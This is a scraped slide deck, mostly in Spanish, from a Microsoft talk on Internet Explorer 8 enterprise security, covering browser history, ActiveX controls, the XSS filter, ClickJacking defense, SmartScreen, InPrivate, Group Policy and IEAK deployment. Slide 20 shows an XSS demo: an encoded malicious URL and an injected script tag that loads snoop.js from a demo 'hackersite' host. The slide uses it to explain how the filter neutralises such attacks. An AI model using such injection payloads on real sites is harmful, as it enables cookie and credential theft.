Successfully reported this slideshow.

Seguridad Corporativa Con Internet Explorer 8(1)

1,074 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Seguridad Corporativa Con Internet Explorer 8(1)

  1. 1. Seguridad Corporativa con Internet Explorer 8<br />Alejandro Ponicke<br />aponicke@microsoft.com<br />Juan Ladetto<br />juanl@microsoft.com<br />
  2. 2. Agenda<br />Evolución de Internet Explorer. Historia.<br />El Browser como puerta de entrada a las amenazas que pululan en Internet, navegación responsable.<br />Cross-side scripting (XSS exploits), ClickJacking y SmartScreen filtering.<br />La mejor ayuda desde el lugar menos pensado: El poder de GroupPolicies controlando IE.<br />Optimización de deployment. Recomendaciones.<br />Extensibilidad: Caso de Uso “IE forKids”.<br />Introducción a IEAK. Usos.<br />
  3. 3. Evolución de Internet Explorer<br />Internet Explorer 1 – 15 de Agosto 1995<br />Parte de Microsoft Plus (Internet Jumpstart Kit in Plus!) - Internet Explorer 1.5 sale unosmesesmástarde y soporta rendering de tablas<br />Internet Explorer 2 – 22 de Noviembre 1995<br />Ahorasoporta SSL, cookies, VRML, newsgroups<br />Internet Explorer 3 – 13 de Agosto 1996<br />Se empieza a volver popular, el primer browser en soportarcss, se agrega java y controlesactiveX, sale con otrosagregados: mail y news, netmeeting y adreess Book (internet y los browsers empiezan a serblanco de los hackers<br />Internet Explorer 4 – 17 de Setiembre 1997<br />Se adapta al SO y ahora con windows desktop update y convierte a windows desktop en Active desktop. Ahorasoporta group policy, internet mail esoutook express y ahoratambién sale con MS chat<br />
  4. 4. Evolución de Internet Explorer<br />Internet Explorer 5 – 18 de Marzo 1999<br />Incluído en windows 98 SE, ahorasoporta bidirectional text, xml, xlt, caracteres ruby , textobidireccional, mhtml y lo mejor de todonaceajax (xmlhttprequest), últimaversiónpara mac y unix<br />Ie 5.5 agregassl de 128 bits, mejoras en printing, html y css compatible con estándares<br />
  5. 5. Pregunta<br />¿CuándoSalio Internet Explorer 6?<br />
  6. 6. Evolución de Internet Explorer<br />Internet Explorer 6 – 27 de Agosto 2001<br />Mejoras en DHTML, inline frames, soporteparcialparacss 1, dom 1 y SMIL 2.0, ieak (ahora se puedecustomizar)<br />En 2010 se acaba el soporte de estaversión<br />Internet Explorer 7 – 18 de Octubre 2006<br />Mejoras en los estándares web, navegaciónpor tabs, search, filtroantiphishing y variasmás<br />Internet Explorer 8 – 19 de Marzo 2009<br />Seguridad, facilidad de acceso, estándares, rss, css y ajaxes la prioridad. motores de rendering (ie7)<br />Internet Explorer 9 - ???<br />
  7. 7. Arquitectura de ie8<br />
  8. 8. Evolution & Change<br />Web 2.0 - significant benefits & challenges<br />Blended threats shifting from the browser<br />Decreasing consumer trust and confidence<br />Data Governance & Regulations<br />Privacy & User Preferences<br />Rapid pace of threat innovation<br />Organized Crime On The Rise<br />Spy<br />Corp Data & National Interest<br />Personal Gain<br />Thief / Organized International Crime<br />Personal Fame<br />Curiosity<br />Vandal<br />Amateur<br />Expert<br />Specialist<br />Script-Kiddy<br />
  9. 9. Security by the Numbers<br />Perception vs. reality<br />
  10. 10. Top Concerns<br />Top User Concerns<br />Protection from intrusions<br />Protection from harm<br />Control on data / privacy<br />Business Concerns<br />Data governance / corporate IP<br />Business Interruption / productivity<br />Impact to brand on consumer confidence<br />
  11. 11. Internet Explorer 8 Trustworthy Browsing <br />Build on a secure foundation<br />Security Development Lifecycle (SDL)<br />Protected Mode<br />ActiveX Controls<br />DEP - Data Execution Prevention<br />Browser Vulnerabilities<br />Extends browser protection to the web server <br />Http only cookies<br />Group Policies<br />XDomainRequest - Cross Domain Requests<br />XDM - Cross Domain Messaging<br />XSS Filter - Cross Site Scripting<br />ClickJacking Defense<br />Web Server & Applications<br />Confidently bank, communicate & shop<br />Extended Validation (EV) SSL Certificates <br />SmartScreen® Filter – Blocks Phishing & Malware <br />Domain Highlighting<br />Enhanced Delete Browsing History <br />InPrivate™ Browsing & Blocking<br />Social Engineering & Privacy<br />IE 7, IE 8<br />
  12. 12. Browser Vulnerabilities<br />
  13. 13. Browser Vulnerabilities<br />ActiveX Hardening & Enhancements <br />Can it be used?<br />Opt –in<br />Is control permitted to run in browser without prompt?<br />IE7<br />Exploit Controls<br />ActiveX Killbits <br />Has control been flagged as unsafe?<br />IE5<br />Where?<br />Per site<br />Is control permitted to run on this site?<br />IE8<br />
  14. 14. Browser Vulnerabilities<br />ActiveX Hardening & Enhancements <br />Doesn’t require users to have admin privileges to install<br />Can be disabled through Group Policy<br />Who?<br />Per User<br />Doesn’t req. elevating admin privileges <br />
  15. 15. Web Server & Applications<br />
  16. 16. Web Server & Applications<br />Secure data exchangeCross Domain Communication<br />SameOrigin Policy<br />Permits scripts running on pages originating from the same site to access each other&apos;s methods and properties with no specific restrictions — but prevents access to most methods and properties across pages on different sites.<br />Workarounds can be dangerous & costly<br />
  17. 17. Web Server & Applications<br />Secure data exchangeInvestments in securing Web 2.0<br />Cross Domain Request (XDomainRequest) <br />Enables web developers to more securely communicate between domains<br />Provides a mechanism to establish trust between domains through an explicit acknowledgement of sharing cross domain, and both parties know which sites are sharing information<br />Proposed to W3C for standardization<br />Cross Document Messaging (XDM)<br />Enables two domains to establish a trust relationship to exchange object messages<br />Provides a web developer a more secure mechanism to build cross domain communication<br />Part of the HTML5 specification<br />
  18. 18. Web Server & Applications<br />XSS Exploits<br />The new buffer overflow; steal cookies & history<br />Log keystrokes<br />Deface sites<br />Steal credentials <br />XSS Filter neuters the attack<br />Blocks the malicious script from executing<br />Port-scan the Intranet<br />Abuse browser/AX vulnerabilities<br />Evade phishing filters<br />Circumvent HTTPS<br />
  19. 19. XSS Demo<br />demo <br />Web Server & Applications<br />
  20. 20. Web Server & Applications<br />Behind The Scenes…<br />Malicious URL in email contains encoded string:http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=%22%3E%3C%73%63%72...<br />Vulnerable application adds &lt;script&gt; tag to page:&lt;script for=window event=onloadsrc=&quot;http://hackersite.ie8demos.com/snoop.js&quot;&gt; &lt;/script&gt;<br />Generated Signature:<br />&lt;SC{R}IPT¤src¤¤http¤¤¤hackersite¤ie8demos¤com¤snoop¤js¤&gt;<br />Neutered Script:<br />&lt;SC#IPT src=http://hackersite.ie8demos.com/snoop.js&gt;<br />
  21. 21. Web Server & Applications<br />ClickJacking<br />Type of Cross Site Request Forgery<br />Entices users to click on content from another domain without the user realizing it. <br />Evolving server exploit<br />Impacts all browsers, only IE 8 has integrated protection capabilities <br />Add an X-FRAME-OPTIONS tag in either the HTTP header.<br />Deny all or allow from SameOrigin hosts<br />
  22. 22. Web Server & Applications<br />ClickJacking<br />
  23. 23. Social Engineering & Privacy<br />
  24. 24. Social Engineering <br />& Privacy<br />Microsoft Confidential – NDA Only<br />
  25. 25. Social Engineering <br />& Privacy<br />Perhaps a more effective warning?<br />
  26. 26. Social Engineering <br />& Privacy<br />EV SSL CertificatesLook for the Green<br />Provides consumers added user confidence and brands enhanced protection<br />Implemented by over 10,000 leading commerce, banking and transactional sites<br />
  27. 27. Social Engineering <br />& Privacy<br />Domain Highlighting<br />Helps to more accurately ascertain the domain of the site they are visiting<br />The domain is black, vs. other characters which are gray<br />
  28. 28. Social Engineering <br />& Privacy<br />SmartScreen™ Filteroffering dynamic protection from<br />Phishing<br />Malware<br />
  29. 29. SmartScreen DemoPhishing & Malware<br />demo <br />Social Engineering <br />& Privacy<br />
  30. 30. User Choice & Control <br />Social Engineering <br />& Privacy<br />Delete Browsing History<br />InPrivate Browsing<br />InPrivate Filtering <br />
  31. 31. Social Engineering <br />& Privacy<br />Delete Browsing History<br />New option to Delete Browsing History while retaining favorites<br />
  32. 32. Social Engineering <br />& Privacy<br />Third Party Content Serving<br />Over time, users’ history and profiles can unknowingly be aggregated<br />Any third-party content can be used like a tracking cookie<br />There is little end-user notification or control today<br />Syndicated photos, weather, stocks, news articles; local analytics, etc…. <br />Unclear accountability with third party security & privacy policies<br />Tailspintoys.com<br />Woodgrovebank.com<br />Farbrikan.com<br />Southridge1-1.com<br />Litware-bulk.com<br />adventureworks.com<br />Northwintd.com<br />Contoso.com<br />User Visits Unique Sites<br />Prosware-sol.com<br />3rd party Syndicator<br />Web server<br />
  33. 33. InPrivate Demo<br />demo <br />Social Engineering <br />& Privacy<br />
  34. 34. AdministracionCentralizadausandopolíticas de grupo<br />
  35. 35.
  36. 36.
  37. 37. Implementando IE8<br /><ul><li>Microsoft Systems Management Software.
  38. 38. Group Policy.
  39. 39. Windows Update.
  40. 40. Windows System Update Services.
  41. 41. Network shared folder. </li></li></ul><li>Creandonuestropropioie (ieak)<br />Aceleradores. Puede incluir valores predeterminados personalizados para Aceleradores en Internet Explorer 8.<br />Web Slices. Puede agregar Web Slices a su paquete personalizado de Internet Explorer 8.<br />Opciones del Asistente para la primera ejecución y Página principal. Puede configurar la experiencia de primera ejecución para Internet Explorer 8.<br />Vista de compatibilidad. Puede elegir si el contenido se representa en el modo estándar de Internet Explorer 8 o el modo Internet Explorer 7.  NotaDe manera predeterminada, todos los sitios en la Zona de Intranet se representan en el modo Internet Explorer 7.<br />Mejoras en las búsquedas. Internet Explorer 8 es compatible con proveedores de búsquedas que ofrecen sugerencias de texto enriquecido e imagen. A través de IEAK 8 puede agregar y configurar estos proveedores para su instalador. <br />Muchas otras características de Internet Explorer 8, como Filtro en privado, Herramientas para desarrolladores y Eliminar el historial de exploración, se pueden personalizar en la página Configuración adicional disponible en el modo Licencia corporativa.<br />
  42. 42. Y ahora?actualizandousuarios y sitiosdesde IE6<br />Migraresmásque un deploy de unanuevaversión (peronecesitamosdar el paso)<br />Los cambios no son sencillospero…<br />http://blogs.msdn.com/ie<br />http://msdn.com/ie<br />http://msdn.com/iecompat<br />http://technet.microsoft.com/en-us/ie/bb219517.aspx<br />

×